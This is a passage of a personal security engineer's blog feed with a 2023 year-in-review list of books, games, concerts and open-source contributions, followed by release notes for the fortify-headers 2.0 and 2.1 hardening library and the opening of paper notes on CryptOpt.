+<li>$5000 to <a href="https://noyb.eu">NOYB</a></li>
+<li>$5000 to <a href="https://riseup.net">Riseup</a></li>
+<li>$5000 to the <a href="https://archive.org">Internet Archive</a></li>
+<li>$5000 to the <a href="https://en.wikipedia.org/wiki/Planned_Parenthood">Planned Parenthood Federation of America</a></li>
+<li>$1000 to <a href="https://daysforgirls.org">days for girls</a>, on the advice of <a href="https://foreignbystander.com/">chik</a> from <a href="https://darkscience.net">darkscience</a>.</li>
+<li>$200 each, as a <a href="https://opensource.googleblog.com/search/label/peer%20bonus">Open Source Peer Bonus</a>, courtesy of Google, to<ul>
+<li><a href="https://github.com/richfelker/">Rich Felker</a> for their work on <a href="https://musl.libc.org">musl</a>.</li>
+<li><a href="https://mxxn.io/">Blaž Hrastnik</a> for their work on <a href="https://helix-editor.com">Helix</a>.</li>
+<li><a href="https://github.com/justinmk">Justin Keyes</a> for their work on <a href="https://neovim.io">Neovim</a>.</li>
+<li><a href="https://github.com/jeanas">Jean Abou-Samra</a> for their work on <a href="https://pygments.org">Pygments</a>.</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>Read a couple of books:<ul>
+<li><a href="https://en.wikipedia.org/wiki/The_Killer_(comics)">Le tueur</a></li>
+<li>Some <a href="https://en.wikipedia.org/wiki/Warhammer_40,000">Warhammer 40,000</a>:<ul>
+<li><a href="https://wh40k.lexicanum.com/wiki/Sons_of_the_Hydra_(Novel)">Sons of the Hydra</a>, neat.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Dark_Imperium_(Anthology)">Dark Imperium (Anthology)</a></li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Shroud_of_Night_(Novel)">Shroud of Night</a>, forgettable.</li>
+<li>The <a href="https://wh40k.lexicanum.com/wiki/Black_Legion_(Novel_Series)">Black Legion</a> duology, solid.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Renegades:_Harrowmaster_(Novel)">Renegades: Harrowmaster</a>, witty.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Assassinorum:_Kingmaker_(Novel)">Assassinorum: Kingmaker</a>, decent.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Night_Lords_(Novel_Series)">Night Lords: The Omnibus</a>, outstanding.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_Deacon_of_Wounds_(Novel)">The Deacon of Wounds</a> great writing style.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Assassinorum:_Execution_Force_(Novel)">Assassinorum: Execution force</a>, forgettable.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_Infinite_and_the_Divine_(Novel)">The Infinite and the Divine</a>, highly entertaining.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_End_and_the_Death:_Volume_I_(Novel)">The End and the Death vol. 1</a>, a <em>teensy</em> bit over the top.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_End_and_the_Death:_Volume_II_(Novel)">The End and the Death vol. 2</a>, almost there, almost there, ...</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_Macharian_Crusade_(Novel_Series)">The Macharian Crusade Omnibus</a>, a writing style a tad heavy.</li>
+<li>The <a href="https://wh40k.lexicanum.com/wiki/Dark_Imperium_(Novel_Series)">Dark Imperium</a> trilogy, nice to see the setting moving forward!</li>
+<li>The first 5 tomes of the <a href="https://wh40k.lexicanum.com/wiki/Dawn_of_Fire_(Novel_Series)">Dawn of Fire</a> heptalogy, definitely a series of books.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_Lion:_Son_of_the_Forest_(Novel)">The Lion: Son of the Forest</a>, I've seen Dragon Balls episodes with a quicker pace.</li>
+<li>Finished the <a href="https://wh40k.lexicanum.com/wiki/The_Beast_Arises_(Novel_Series)">Beast Arises</a>
+ dodecalogy. The last chapter of the final book deserved a book on its own,
+ instead of being speedrunned in ~30 pages.</li>
+</ul>
+</li>
+<li><a href="https://en.wikipedia.org/wiki/It%27s_OK_to_Be_Angry_About_Capitalism">It's OK to Be Angry About Capitalism</a></li>
+<li><a href="https://nostarch.com/hacks-leaks-and-revelations">Hacks, Leaks, and Revelations</a>: a <a href="https://dustri.org/b/book-review-hacks-leaks-and-revelations.html">reference</a></li>
+<li><a href="https://direct.mit.edu/books/book/3008/Beyond-ChoicesThe-Design-of-Ethical-Gameplay">Beyond choices: The design of ethical gameplay</a></li>
+<li><a href="https://editions-ixe.fr/catalogue/non-le-masculin-ne-lemporte-pas-sur-le-feminin-ned/">Non, le masculin ne l’emporte pas sur le féminin !</a></li>
+<li><a href="https://en.wikipedia.org/wiki/This_Changes_Everything_(book)">This Changes Everything: Capitalism vs. the Climate</a></li>
+<li><a href="https://www.goodreads.com/en/book/show/51176626">Break 'em Up: Recovering Our Freedom from Big Ag, Big Tech, and Big Money</a>.</li>
+<li><a href="https://aosabook.org/en/buy.html">The Performance of Open Source Applications</a>: contains some really nice tidbits.</li>
+<li><a href="https://aosabook.org/en/">The Architecture of Open Source Applications, Part 1.</a>: computers were a mistake.</li>
+<li><a href="https://nostarch.com/kill-it-fire">Kill It with Fire: Manage Aging Computer Systems (and Future Proof Modern Ones)</a></li>
+<li><a href="https://goodreads.com/book/show/38212110-technically-wrong">Technically Wrong: Sexist Apps, Biased Algorithms, and Other Threats of Toxic Tech</a></li>
+<li><a href="https://nostarch.com/locksport">Locksport - A Hacker’s Guide to Lockpicking, Impressioning, and Safe Cracking</a>: <a href="https://dustri.org/b/book-review-locksport-a-hackers-guide-to-lockpicking-impressioning-and-safe-cracking.html">great</a></li>
+<li><a href="https://freakyclown.com/publications">How I Rob Banks (and other such places)</a>, written in an unbearably cocky style, mildly entertaining.</li>
+<li><a href="https://samleecole.com">How Sex Changed the Internet and the Internet Changed Sex: An Unexpected History</a>, a bit too shallow for my taste.</li>
+<li><a href="https://toddrose.com/endofaverage">The End of Average</a>, great book, except the part where the author argues that the goal of schools is to prepare kids for jobs.</li>
+<li><a href="https://staffeng.com/book">Staff Engineer: Leadership beyond the management track</a>, I'm not there yet, but it helped me understand some coworker's jobs and struggles.</li>
+<li><a href="https://thirdeditions.com/en/sagas/94-metal-gear-solid-hideo-kojima-s-magnum-opus-9791094723616.html">Metal Gear Solid. Hideo Kojima's Magnum Opus</a>:
+ deluge of superlatives directed at Kojima, speculative opinionated wild rambling, no mention of the <a href="https://en.wikipedia.org/wiki/Quiet_(Metal_Gear)">rampant</a>
+ <a href="https://theguardian.com/technology/2014/apr/09/metal-gear-solid-ground-zeroes-sexual-violence">sexism</a>,
+ typos and frenchisms, … prefer the <a href="https://en.wikipedia.org/wiki/Metal_Gear">wikipedia</a> and <a href="https://metalgear.fandom.com/wiki/Metal_Gear_Wiki">fandom</a> pages instead.</li>
+<li><a href="https://en.wikipedia.org/wiki/The_Mirage_(Ruff_novel)">The Mirage</a>: I
+ was expecting more of a description of an alternative history than a
+ novel with a lame plot and forgettable characters. The humour is goofy
+ and unsubtle: a punk rock group called Green Desert has an anti-war
+ anthem named "Arabian Idiot"; a morning talk show called Jazeera &
+ Friends, … but this is completely on par with the post-11-September
+ anti-muslim/Iraqi rhetoric, making it both funny and perfectly adequate.</li>
+</ul>
+</li>
+<li>Moved back to France.</li>
+<li>Volunteered at a library.</li>
+<li>Refused to sell <a href="https://websec.fr">websec.fr</a></li>
+<li>Listened to <a href="https://listenbrainz.org/user/jvoisin/year-in-music/">some music</a>.</li>
+<li>Attended some concerts:<ul>
+<li><a href="https://en.wikipedia.org/wiki/Eisbrecher">Eisbrecher</a>, along with <a href="https://maerzfeld.de">Maerzfeld</a></li>
+<li><a href="https://gojira-music.com">Gojira</a>, along with <a href="https://alienweaponry.com">Alien Weaponry</a></li>
+<li><a href="https://katatonia.com">Katatonia</a>, along with
+ <a href="https://som.band">SOM</a> and <a href="https://solstafir.net">Sólstafir</a></li>
+<li><a href="https://heavenshallburn.com">Heaven Shall Burn</a>, along with
+ <a href="https://trivium.org">Trivium</a>,
+ <a href="https://en.wikipedia.org/wiki/Malevolence_(band)">Malevolence</a>, and
+ <a href="https://obituary.cc">Obituary</a></li>
+<li><a href="https://igorrr.com">Igorrr</a>, along with
+ <a href="https://derwegeinerfreiheit.de">Der Weg einer Freiheit</a>,
+ <a href="https://en.wikipedia.org/wiki/Amenra">Amenra</a>, and
+ <a href="http://hangmanschair.com">Hangman's Chain</a></li>
+</ul>
+</li>
+<li>Played some video games:<ul>
+<li>On a computer:<ul>
+<li><a href="https://www.doomworld.com/forum/topic/134292-myhousewad/">MyHouse.WAD</a>: <a href="https://doomwiki.org/wiki/My_House">wow</a>.</li>
+<li><a href="https://en.wikipedia.org/wiki/Observer_(video_game)">>observer_</a>: didn't like it.</li>
+<li><a href="https://en.wikipedia.org/wiki/Sea_of_Thieves">Sea of Thieves</a>, ~ok with friends.</li>
+<li><a href="https://hyperstrange.com/our-games/blood-west/">Blood West</a>: <a href="https://en.wikipedia.org/wiki/Thief_(series)">Thief</a> in the Far West.</li>
+<li><a href="https://en.wikipedia.org/wiki/Half-Life%3A_Alyx">Half Life: Alyx</a>: impressive in every way.</li>
+<li><a href="https://en.wikipedia.org/wiki/High_on_Life_(video_game)">High on Life</a>: excruciatingly tedious at best.</li>
+<li><a href="https://en.wikipedia.org/wiki/Cyberpunk_2077#Cyberpunk_2077:_Phantom_Liberty">Cyberpunk 2077: Phantom Liberty</a>: glorious.</li>
+<li><a href="https://en.wikipedia.org/wiki/Tom_Clancy's_Rainbow_Six_Siege">Rainbow Six: Siege</a>: better than <a href="https://en.wikipedia.org/wiki/Counter-Strike">Counter Strike</a>.</li>
+<li><a href="https://en.wikipedia.org/wiki/Hogwarts_Legacy">Hogwarts Legacy</a>: breathtaking and well rounded.</li>
+<li><a href="https://store.steampowered.com/app/2329130/Rewind_Or_Die/">Rewind or Die</a> felt like playing resident evil again <3</li>
+<li><a href="https://en.wikipedia.org/wiki/Outer_Wilds">Outer Wilds</a>: the controls were too terrible for me to play.</li>
+<li><a href="https://en.wikipedia.org/wiki/The_Last_of_Us_Part_I">The Last of Us Part 1</a>: ok-ish, not my jam, Joel is a moron.</li>
+<li><a href="https://en.wikipedia.org/wiki/The_Witcher_3%3A_Wild_Hunt">The Witcher 3 - Wild Hunt</a>: when did video game get so long…</li>
+<li><a href="https://en.wikipedia.org/wiki/Apex_Legends">Apex Legends</a>: a lame version of <a href="https://en.wikipedia.org/wiki/Titanfall_2">Titanfall 2</a>, ok-ish when playing ranked.</li>
+<li><a href="https://en.wikipedia.org/wiki/Warhammer_40,000:_Chaos_Gate_-_Daemonhunters">Warhammer 40,000: Chaos Gate - Daemonhunters</a>:
+ <a href="https://en.wikipedia.org/wiki/XCOM">XCOM</a> with <a href="https://wh40k.lexicanum.com/wiki/Grey_Knights">Grey knights</a>.</li>
+<li><a href="https://en.wikipedia.org/wiki/Metal%3A_Hellsinger">Metal: Hellsinger</a>: looked super-lame on gameplay videos, but was surprisingly fun.</li>
+<li><a href="https://en.wikipedia.org/wiki/Starfield_(video_game)">Starfield</a>: a buggy clunky quickly-boring
+ <a href="https://en.wikipedia.org/wiki/The_Elder_Scrolls_V:_Skyrim">Skyrim</a> in space, quickly went back to Cyberpunk 2077.</li>
+<li><a href="https://store.steampowered.com/app/1172650/INDUSTRIA/">Industria</a>: catastrophic performances for looking utterly terrible, along with a clunky feeling, promptly uninstalled.</li>
+<li><a href="https://en.wikipedia.org/wiki/Journey_to_the_Savage_Planet">Journey to the Savage Planet</a>: Rich in poop-oriented
+ jokes, trying hard to be funny and maybe even subversive but systematically falling flat.</li>
+<li><a href="https://en.wikipedia.org/wiki/Baldur%27s_Gate_3">Baldur's Gate 3</a>: not a
+ fan of the <a href="https://en.wikipedia.org/wiki/Dungeons_%26_Dragons">Dungeons & Dragons</a> dice-based
+ gameplay, nor of the hard dialog choices cutting entire parts of the game,
+ but still an amazing game.</li>
+<li><a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain">Metal Gear Solid V: The Definitive Experience</a>,
+ so <a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_Ground_Zeroes">Metal Gear Solid V: Ground Zeroes</a> and
+ <a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain">Metal Gear Solid V: The Phantom Pain</a>.
+ I bought it after having seen the former being run at the <a href="https://gamesdonequick.com/tracker/run/5506">AGDQ 2023</a>.
+ Truly amazing game overall, except for the <a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain#Portrayal_of_Quiet">sexualisation of the <em>sole</em> female character</a>.</li>
+</ul>
+</li>
+<li>On a (glorious) <a href="https://en.wikipedia.org/wiki/Steam_Deck">Steam Deck</a>:<ul>
+<li><a href="https://store.steampowered.com/app/638990/UNDYING/">UNDYING</a>: nice
+ zombie-related game.</li>
+<li><a href="https://store.steampowered.com/agecheck/app/1593500/">God of War</a>,
+ surprisingly "wholesome".</li>
+<li><a href="https://blacksaltgames.com/">Dredge</a>, terrific indie game: gorgeous looking, simple yet gripping gameplay, interesting lore and story, …</li>
+<li><a href="https://en.wikipedia.org/wiki/Vampyr_(video_game)">Vampyr</a>, because
+ I miss <a href="https://en.wikipedia.org/wiki/Vampire:_The_Masquerade_%E2%80%93_Bloodlines">Vampire: The Masquerade – Bloodlines</a>. It could have been so much more instead of being "meh".</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>Ported <a href="https://github.com/jvoisin/snuffleupagus">Snuffleupagus</a> to PHP8.3.</li>
+<li>Contributed to a couple of software:<ul>
+<li><a href="https://github.com/lite-xl/lite-xl/pulls?q=is%3Apr+author%3Ajvoisin">lite-xl</a></li>
+<li><a href="https://alpinelinux.org/">Alpine linux</a>, by:<ul>
+<li>becoming a <a href="https://pkgs.alpinelinux.org/packages?branch=edge&repo=&arch=&maintainer=Julien%20Voisin">package maintainer</a></li>
+<li><a href="https://gitlab.alpinelinux.org/alpine/tsc/-/issues/64">documenting a bit</a> the compiler-based mitigations,
+ and <a href="https://gitlab.alpinelinux.org/alpine/abuild/-/merge_requests/221">enabling some missing ones</a>.</li>
+</ul>
+</li>
+<li>Because of <a href="https://runzero.com">runZero</a>, I<ul>
+<li><a href="https://github.com/rapid7/recog/pulls?q=+is%3Apr+author%3Ajvoisin">contributed to recog</a> to improve some of its fingerprints;</li>
+<li><a href="https://github.com/Sonarr/Sonarr/issues/5601">made it less trivial</a> to detect Sonarr/Lidarr/Radarr/… versions.</li>
+</ul>
+</li>
+<li><a href="https://github.com/struct/isoalloc/pulls?q=is%3Apr+author%3Ajvoisin+created%3A2023">isoalloc</a></li>
+<li><a href="https://github.com/pygments/pygments/commits?author=jvoisin">pygments</a>, mainly by adding lexers.</li>
+<li><a href="https://github.com/morpheus65535/bazarr/pull/2304">bazaar</a>, making it work on Alpine Linux.</li>
+<li><a href="https://github.com/google/oss-fuzz/pulls?q=is%3Apr+author%3Ajvoisin">oss-fuzz</a>,
+ including some <a href="https://github.com/guidovranken/python-library-fuzzers/pulls?q=is%3Apr+author%3Ajvoisin">python fuzzers</a>.</li>
+<li><a href="https://github.com/daanx/mimalloc-bench">mimalloc-bench</a>,
+ resulting in some <a href="https://github.com/microsoft/snmalloc/pull/587#issuecomment-1442077886">real world improvements</a>.</li>
+<li><a href="https://github.com/quodlibet/mutagen/pulls/jvoisin">mutagen</a>, since it's
+ used by <a href="https://0xacab.org/jvoisin/mat2">mat2</a>. I even <a href="https://github.com/google/oss-fuzz/pull/10072">integrated it into
+ OSS-Fuzz</a>.</li>
+<li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is%3Apr+jvoisin">metasploit</a>,
+by doing a lot of code reviews for pull-requests, and landing some modules,
+ like a <a href="https://github.com/rapid7/metasploit-framework/pull/17711">SPIP RCE</a>,
+ courtesy of <a href="https://thinkloveshare.com/">Laluka</a> and <a href="https://twitter.com/coiffeur0x90">coiffeur</a>.</li>
+<li><a href="https://chrony.tuxfamily.org/">chrony</a>, spending some time debugging
+ <a href="https://mail-archive.com/chrony-dev@chrony.tuxfamily.org/msg02572.html">how to enable its seccomp sandbox</a>
+ on Alpine Linux, resulting in a <a href="https://gitlab.alpinelinux.org/alpine/aports/-/issues/14891#note_316587">couple of improvements</a>,
+ and of course a <a href="https://gitlab.alpinelinux.org/alpine/aports/-/merge_requests/47087">now-enabled-by-default sandbox</a> there.</li>
+</ul>
+</li>
+<li>Got a CVE for a bug I <a href="https://github.com/py-pdf/pypdf/security/advisories/GHSA-jrm6-h9cq-8gqw">reported</a> in 2020!</li>
+<li>Kept maintaining <a href="https://openmw.org">OpenMW</a>'s infrastructure.</li>
+<li>Learnt some <a href="https://en.wikipedia.org/wiki/Rust_(programming_language)">Rust</a> so I could hang out with the cool kids.</li>
+<li>Helped organise the <a href="http://g.co/ctf">GoogleCTF</a>, which was <a href="https://ctftime.org/event/1929">pretty well received</a>.</li>
+<li>Added more possible subtitles to this blog, bringing their numbers above 1100.</li>
+<li>Reduced the size of this website's webpages; most should now be around 10kb.</li>
+<li>Contributed a bit to Wikipedia, in <a href="https://en.wikipedia.org/wiki/Special:Contributions/jvoisin">English</a> and in <a href="https://fr.wikipedia.org/wiki/Sp%C3%A9cial:Contributions/jvoisin">French</a>
+ under my usual nickname.</li>
+<li>Moved my emails away from <a href="https://gandi.net">Gandi</a> over to <a href="https://migadu.com">Migadu</a>,
+ given their <a href="https://chatting.neocities.org/posts/2023-gandi-pricing">ludicrous</a> post-acquisition price increase.</li>
+<li><a href="https://github.com/jvoisin/compiler-flags-distro">Investigated</a> what
+ hardening-related compiler flags where enabled by default by popular Linux
+ distributions.</li>
+<li><a href="https://tests.stockfishchess.org/users#jvoisin">Contributed a bit</a> (by crunching numbers) to <a href="https://stockfishchess.org/">Stockfish</a>,
+ an open-source chess engine with an <a href="https://en.wikipedia.org/wiki/Elo_rating_system">Elo rating</a>
+ around <a href="https://computerchess.org.uk/ccrl/4040/rating_list_all.html">3500</a>.</li>
+<li>Got featured a couple of times on Hackernew/reddit/lobste.rs/… frontpage,
+ thanks to a <s><a href="https://www.reddit.com/r/karma/wiki/index/faq/">karma</a> junkie</s>
+ marketing-able <a href="https://dijit.sh">friend</a></li>
+<li>Kept maintaining <a href="https://nos-oignons.net/">Nos Oignons</a>'s infrastructure with <a href="https://corl3ss.com/">corl3ss</a>.
+ We're back at handling <a href="https://nos-oignons.net/Services/index.en.html">around 2%</a>
+ of tor's exit traffic! Our little non-profit is now 10 years old.</li>
+<li><a href="https://github.com/jvoisin/fortify-headers">Took over</a> the development and maintenance of
+ <a href="https://u.2f30.org/sin/">sin</a>'s <a href="https://git.2f30.org/fortify-headers/">fortify-headers</a>.
+ It's used by <a href="https://openwrt.org/">OpenWrt</a>, <a href="https://www.alpinelinux.org/">Alpine Linux</a>,
+ and <a href="https://bugs.gentoo.org/546692">soon</a> in <a href="https://wiki.gentoo.org/wiki/Project:Musl">Gentoo Hardened's musl flavour</a>.</li>
+<li>Ported my resume/cover letter template from
+ <a href="https://latex-project.org">LaTeX</a> to
+ <a href="https://typst.app/docs/guides/guide-for-latex-users/">typst</a> and felt so
+ much joy purging away all the LaTeX/TeXLive/XeTeX/LuaTeX/… garbage from my computer,
+ to never have to touch it again.</li>
+<li>Got a "Documented Feedback from Employee Relations" from HR at work for
+ saying "Awkward to have yet another middle aged rich white het guy come talk
+ about diversity and inclusion." on an internal chatroom, about <a href="https://booleanblackbelt.com/who-is-the-boolean-black-belt/">this middle
+ aged rich white het guy</a>
+ invited to give an internal talk about diversity and inclusion.</li>
+</ul>fortify-headers 2.12023-12-16T20:30:00+01:002023-12-16T20:30:00+01:00jvoisintag:dustri.org,2023-12-16:/b/fortify-headers-21.html<p>Only 4 days after the <a href="https://dustri.org/b/fortify-headers-20.html">release</a> of
+<a href="https://github.com/jvoisin/fortify-headers">fortify-headers</a>,
+here is the <a href="https://github.com/jvoisin/fortify-headers/releases/tag/2.1">2.1</a>,
+fixing a couple of portability issues and tidying a bit the code.
+<a href="https://chimera-linux.org/">Chimera Linux</a> users are
+<a href="https://github.com/chimera-linux/cports/commit/a26be649d8a13c1012d5e165055d354a6bab1af8">as of today</a>
+<del>test driving</del> benefiting from it.</p>
+<h2>Changelog</h2>
+<ul>
+<li>Remove superfluous includes from the headers</li>
+<li>Put some functions in to their …</li></ul><p>Only 4 days after the <a href="https://dustri.org/b/fortify-headers-20.html">release</a> of
+<a href="https://github.com/jvoisin/fortify-headers">fortify-headers</a>,
+here is the <a href="https://github.com/jvoisin/fortify-headers/releases/tag/2.1">2.1</a>,
+fixing a couple of portability issues and tidying a bit the code.
+<a href="https://chimera-linux.org/">Chimera Linux</a> users are
+<a href="https://github.com/chimera-linux/cports/commit/a26be649d8a13c1012d5e165055d354a6bab1af8">as of today</a>
+<del>test driving</del> benefiting from it.</p>
+<h2>Changelog</h2>
+<ul>
+<li>Remove superfluous includes from the headers</li>
+<li>Put some functions in to their proper files</li>
+<li>Add a missing include in <code>sys/select.h</code></li>
+<li>Do not use static inline for C++ to avoid <a href="https://en.wikipedia.org/wiki/One_Definition_Rule">ODR</a>-wise violation</li>
+<li>Guard some conditional stdio APIs with the right macros</li>
+<li>Fix a typo that would prevent C++ code from compiling correctly</li>
+<li>Rename macros to be more namespace-friendly</li>
+</ul>
+<h2>Implementation details</h2>
+<p>Including parts from the
+<a href="https://en.wikipedia.org/wiki/Standard_library">stdlib</a> in fortify means that
+programs that don't correctly include everything they need might compile, even
+though they shouldn't. Fortunately, the only bits used are either:</p>
+<ul>
+<li><code>size_t</code>, which can be obtained by using <code>typeof(sizeof(char))</code>,
+ since it's by definition the type returned by <code>sizeof</code>.</li>
+<li>constants like <code>PATH_MAX</code> (that we can define to <code>4096</code>), <code>MB_LEN_MAX</code>
+ (defined as 16), ...</li>
+<li>eldritch constructs like <a href="https://www.man7.org/linux/man-pages/man3/MB_CUR_MAX.3.html"><code>MB_CUR_MAX</code></a>,
+ whose usage we hide behind an <code>#ifdef</code>.</li>
+</ul>
+<p>The other big thing is the one caught by <a href="https://github.com/ssbr">Devin Jeanpierre</a>, the usage of <code>static
+inline</code> while <a href="https://en.cppreference.com/w/c/language/inline">absolutely alright in C</a>,
+is problematic in C++, because of the <a href="https://en.wikipedia.org/wiki/One_Definition_Rule">One Definition Rule</a>:
+In C++, if a function is declared inline, it must be declared inline in every translation unit, and also every
+definition of an inline function must be exactly the same (while in C they may
+be different.) On the other hand, C++ allows non-const function-local
+statics and all function-local statics from different definitions of an inline
+function are the same in C++, but distinct in C.
+More practically, calling <code>FORTIFY_INLINE</code> functions from an inline function in C++, and including
+the header defining that inline function in more than one <a href="https://en.wikipedia.org/wiki/Translation_unit_%28programming%29">translation
+unit</a> results
+in undefined behaviour. The fix is easy, and was
+<a href="https://github.com/jvoisin/fortify-headers/commit/c607773a80e6685ab4c922245c33cf2ea5dcfb72">commited</a>
+by <a href="https;//github.com/q66">q66</a>: use <code>static</code> instead of <code>static inline</code> in C++.</p>
+<p>Thanks <a href="https://github.com/ssbr">Devin Jeanpierre</a> for spending time to look at
+C++ compatibility, <a href="https://github.com/q66">q66</a> for his patches, willingness to ship
+fortify-headers in Chimera, and becoming co-maintainer.</p>fortify-headers 2.02023-12-12T23:30:00+01:002023-12-12T23:30:00+01:00jvoisintag:dustri.org,2023-12-12:/b/fortify-headers-20.html<p>8 months ago, I started to contribute to <a href="https://git.2f30.org/fortify-headers/">fortify-headers</a>,
+a standalone <a href="https://gcc.gnu.org/legacy-ml/gcc-patches/2004-09/msg02055.html">fortify-source</a> implementation,
+with the goal of implementing <code>FORTIFY_SOURCE=3</code>, since the current version
+only implemented <code>FORTIFY_SOURCE=2</code>. I reached out to
+<a href="https://u.2f30.org/sin/">sin</a>, the original maintainer, to ask if he was
+interested in my changes, and he told me the …</p><p>8 months ago, I started to contribute to <a href="https://git.2f30.org/fortify-headers/">fortify-headers</a>,
+a standalone <a href="https://gcc.gnu.org/legacy-ml/gcc-patches/2004-09/msg02055.html">fortify-source</a> implementation,
+with the goal of implementing <code>FORTIFY_SOURCE=3</code>, since the current version
+only implemented <code>FORTIFY_SOURCE=2</code>. I reached out to
+<a href="https://u.2f30.org/sin/">sin</a>, the original maintainer, to ask if he was
+interested in my changes, and he told me the project wasn't maintained
+anymore. But he would be happy to give me the commit bit instead. I spent
+some months <a href="https://github.com/jvoisin/fortify-headers">writing code</a> before
+accepting, to see if it would be a good idea: Would I be able to maintain it?
+To improve it? Add more features? and so on. Turns out the answer is yes, and
+I'm thus happy to announce the immediate availability of <a href="https://git.2f30.org/fortify-headers/refs.html">fortify-headers
+2.0</a>!</p>
+<h2>Changelog</h2>
+<ul>
+<li>Added clang support, based on <a href="https://github.com/q66">q66</a>'s patches.</li>
+<li>Fixed a 64b-related incompatibility around <code>ppoll</code> </li>
+<li>Added a ton of tests, with <a href="https://jvoisin.github.io/fortify-headers/">around 90% of coverage</a></li>
+<li>Made use of <code>__builtin_dynamic_object_size</code> when <code>FORTIFY_SOURCE=3</code> is used,
+ instead of <code>__builtin_object_size</code>.</li>
+<li>Made use of <a href="https://clang.llvm.org/docs/AttributeReference.html">attributes</a>:
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#alloc-size">alloc_size</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#diagnose-as-builtin">diagnose_as_builtin</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#diagnose-if">diagnose_if</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#format">format</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#malloc">malloc</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#nodiscard-warn-unused-result">warn_unused_result</a>,
+ …</li>
+<li>Added some missing functions, like <code>calloc</code>, <code>fdopen</code>, <code>fmemopen</code>, <code>fprintf</code>,
+ <code>malloc</code>, <code>memchr</code>, <code>popen</code>, <code>printf</code>, <code>qsort</code>, <code>umask</code>, …</li>
+<li>Added continuous integration, both on clang and gcc, covering the whole range
+ of supported versions across the latest Ubuntu LTS.</li>
+</ul>
+<h2>Implementation details</h2>
+<p>Since this is a pretty uncommon piece of software, friends of mine have been
+asking me details about the involved black magic.
+While it's possible to overload functions with the
+<a href="https://clang.llvm.org/docs/AttributeReference.html#overloadable">overloadable</a>
+attribute in C, there isn't really something similar for drive-by overloading.
+Fortunately, it's possible to hack an equivalent by combining
+<a href="https://gcc.gnu.org/onlinedocs/cpp/Wrapper-Headers.html"><code>#include_next</code></a> with
+the following macros:</p>
+<div class="codehilite"><pre><span></span><code><span class="cp">#define _FORTIFY_STR(s) #s</span>
+<span class="cp">#define _FORTIFY_ORIG(p, fn) __typeof__(fn) __orig_##fn __asm__(_FORTIFY_STR(p) #fn)</span>
+<span class="cp">#define _FORTIFY_FNB(fn) _FORTIFY_ORIG(__USER_LABEL_PREFIX__, fn)</span>
+<span class="cp">#define _FORTIFY_FN(fn) _FORTIFY_FNB(fn); _FORTIFY_INLINE</span>
+</code></pre></div>
+
+<p>This makes the original function available when prefixed with <code>__orig</code>,
+while allowing overloading.
+On clang, the <a href="https://clang.llvm.org/docs/AttributeReference.html#pass-object-size-pass-dynamic-object-size"><code>pass_object_size</code>/<code>pass_dynamic_object_size</code></a>
+attribute is used to pass down arguments size; the assembly label preventing
+weird <a href="https://en.wikipedia.org/wiki/Name_mangling">mangling</a> issues. Since
+it's only a label, despite being assembly, it's still portable across various
+architectures. The <code>_FORTIFY_INLINE</code> macro contains all possible "please inline this
+function" directives as possible, to avoid polluting the symbols.</p>
+<p>There is of course a ton of <code>#ifdef</code>/<code>#if __has_atribute</code>/… to work around various
+compiler intrinsics, like clang missing <code>__builtin_va_arg_pack</code> or gcc missing
+<code>diagnose_if</code>, so that fortify-headers will always make use of the most
+features available.</p>
+<p>It is indeed a particularly gross pile of hacks,
+but this is C, also known as "nice things and why we can't have them."</p>
+<p>Thanks to <a href="https://u.2f30.org/sin/">sin</a> for creating the project and
+maintaining it for years, <a href="https://daniel.micay.dev">strcat</a> for his inspiring
+work on fortifying <a href="https://en.wikipedia.org/wiki/Bionic_(software)">bionic</a>,
+<a href="https://github.com/q66">q66</a> for his clang patches and general support,
+the friendly people from <a href="https://2f30.org">2f30</a> for their patience,
+<a href="http://serge.liyun.free.fr/serge/">Serge Sans Paille</a> for his <a href="https://github.com/serge-sans-paille/fortify-test-suite">testsuite</a>,
+<a href="https://people.freebsd.org/~kevans/">kevans</a> for his work on fortifying
+<a href="https://reviews.freebsd.org/D32306">FreeBSD's libc</a>,
+Red Hat from pushing <code>FORTIFY_SOURCE=2</code> and <code>FORTIFY_SOURCE=3</code> forward,
+...</p>Paper notes: CryptOpt2023-12-01T12:30:00+01:002023-12-01T12:30:00+01:00jvoisintag:dustri.org,2023-12-01:/b/paper-notes-cryptopt.html<ul>
+<li>Full title: CryptOpt: Verified Compilation with Randomized Program Search for Cryptographic Primitives</li>
+<li>PDF: <a href="https://arxiv.org/abs/2211.10665">arXiv</a> (<a href="https://dustri.org/b/files/papers/cryptopt.pdf">local mirror</a>)</li>
+<li>Authors: Joel Kuepper, Andres Erbsen, Jason Gross, Owen Conoly, Chuyue Sun, Samuel Tian, David Wu, Adam Chlipala, Chitchanok Chuengsatiansup, Daniel Genkin, Markus Wagner, Yuval Yarom</li>
+</ul>
+<p>Cryptography is hard, high-performance one even more so: formal …</p><ul>
+<li>Full title: CryptOpt: Verified Compilation with Randomized Program Search for Cryptographic Primitives</li>
+<li>PDF: <a href="https://arxiv.org/abs/2211.10665">arXiv</a> (<a href="https://dustri.org/b/files/papers/cryptopt.pdf">local mirror</a>)</li>
